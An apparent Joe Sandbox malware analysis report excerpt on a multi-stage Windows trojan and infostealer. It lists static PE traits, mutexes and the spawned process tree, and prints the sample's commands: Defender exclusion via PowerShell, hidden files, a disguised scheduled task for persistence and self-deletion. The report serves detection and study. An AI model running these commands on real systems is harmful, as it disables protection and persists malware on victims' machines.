                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD1E887_2_09BD1E88
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD95987_2_09BD9598
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD14507_2_09BD1450
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD89607_2_09BD8960
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD89507_2_09BD8950
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD18E87_2_09BD18E8
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD18D87_2_09BD18D8
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD2BE07_2_09BD2BE0
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD3BD87_2_09BD3BD8
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD3BD27_2_09BD3BD2
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD0AF17_2_09BD0AF1
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD4DE07_2_09BD4DE0
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD4DDF7_2_09BD4DDF
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD8D207_2_09BD8D20
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD8D107_2_09BD8D10
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD2C107_2_09BD2C10
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD4FE87_2_09BD4FE8
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD4FDA7_2_09BD4FDA
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD7F627_2_09BD7F62
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD9E887_2_09BD9E88
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD1E877_2_09BD1E87
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD003F7_2_09BD003F
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD00407_2_09BD0040
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD82287_2_09BD8228
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD82187_2_09BD8218
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD52787_2_09BD5278
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD52777_2_09BD5277
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD95887_2_09BD9588
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD85687_2_09BD8568
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD85587_2_09BD8558
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD54587_2_09BD5458
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BDA4487_2_09BDA448
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD544A7_2_09BD544A
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BDA4477_2_09BDA447
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD14417_2_09BD1441
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09F021067_2_09F02106
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09F0A5147_2_09F0A514
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09F0BD987_2_09F0BD98
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09F02FC07_2_09F02FC0
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_031DA3A89_2_031DA3A8
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_031D21B09_2_031D21B0
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_031D21C09_2_031D21C0
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AC17D09_2_05AC17D0
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AC28789_2_05AC2878
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AC1B079_2_05AC1B07
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD7F389_2_05AD7F38
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD3F509_2_05AD3F50
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD46139_2_05AD4613
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD76689_2_05AD7668
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD489F9_2_05AD489F
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD426F9_2_05AD426F
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD45BC9_2_05AD45BC
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD45B09_2_05AD45B0
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD45EA9_2_05AD45EA
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD3F869_2_05AD3F86
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD3F509_2_05AD3F50
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD3F439_2_05AD3F43
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD49E19_2_05AD49E1
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD23D89_2_05AD23D8
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD73209_2_05AD7320
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD42F49_2_05AD42F4
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD42299_2_05AD4229
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD4A019_2_05AD4A01
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AD421D9_2_05AD421D
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AE49A09_2_05AE49A0
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AE99F89_2_05AE99F8
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AE8E889_2_05AE8E88
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AE8E799_2_05AE8E79
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AE49909_2_05AE4990
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AE99E89_2_05AE99E8
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_05AE9B7B9_2_05AE9B7B
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: Security
                              Source: C:\Users\user\Desktop\file.exeCode function: String function: 007F80C0 appears 130 times
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00B8DF80 appears 81 times
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BA8E10 appears 47 times
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00B880C0 appears 393 times
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00B8D64E appears 79 times
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00B87A00 appears 39 times
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00B8D942 appears 85 times
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00B8D663 appears 40 times
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 684
                              Source: 96ae609d19.exe.6.drStatic PE information: No import functions for PE file found
                              Source: random[2].exe.6.drStatic PE information: No import functions for PE file found
                              Source: 96ae609d19.exe.6.drStatic PE information: Data appended to the last section found
                              Source: random[2].exe.6.drStatic PE information: Data appended to the last section found
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: zudFSfy[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: zudFSfy.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: kz8ZdyP[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: kz8ZdyP.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9983555432561307
                              Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9983555432561307
                              Source: random[1].exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                              Source: random[1].exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                              Source: 641d24797a.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                              Source: 641d24797a.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                              Source: random[1].exe1.6.drStatic PE information: Section: ZLIB complexity 0.995773033902214
                              Source: random[1].exe1.6.drStatic PE information: Section: alcvhdaz ZLIB complexity 0.9926109047202797
                              Source: ac68c6b737.exe.6.drStatic PE information: Section: ZLIB complexity 0.995773033902214
                              Source: ac68c6b737.exe.6.drStatic PE information: Section: alcvhdaz ZLIB complexity 0.9926109047202797
                              Source: e56fffc2ce.exe.6.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: e56fffc2ce.exe.6.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, p70yJbu5bF4vKhUO1a.csSecurity API names: _0020.SetAccessControl
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, p70yJbu5bF4vKhUO1a.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, p70yJbu5bF4vKhUO1a.csSecurity API names: _0020.AddAccessRule
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, IHOLEvy0T7QhOrsMmC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: random[1].exe0.6.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: random[1].exe0.6.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: ac68c6b737.exe, 00000015.00000002.2763969121.0000000000159000.00000040.00000001.01000000.00000014.sdmp, ac68c6b737.exe, 00000015.00000003.2721732404.0000000004948000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                              Source: svchost.exe, 00000016.00000002.2756608289.0000000002C00000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: cWM1Z.SLN
                              Source: ac68c6b737.exe, 00000015.00000002.2763969121.0000000000159000.00000040.00000001.01000000.00000014.sdmp, ac68c6b737.exe, 00000015.00000003.2721732404.0000000004948000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@79/57@5/7
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\zudFSfy[1].exeJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMutant created: \Sessions\1\BaseNamedObjects\80065eb12166c1a5
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
                              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-41f5ca1f-12f2-e123ed-b12badd5efaa}
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMutant created: \Sessions\1\BaseNamedObjects\d64bb8558ef9e818
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_03
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: file.exeVirustotal: Detection: 53%
                              Source: file.exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe "C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess created: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe "C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe "C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeProcess created: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe "C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeProcess created: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe "C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe "C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe "C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 684
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe "C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe "C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe "C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                              Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                              Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeProcess created: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe "C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe"
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe "C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe "C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe "C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe "C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe "C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe "C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess created: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe "C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeProcess created: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe "C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeProcess created: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe "C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy"
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
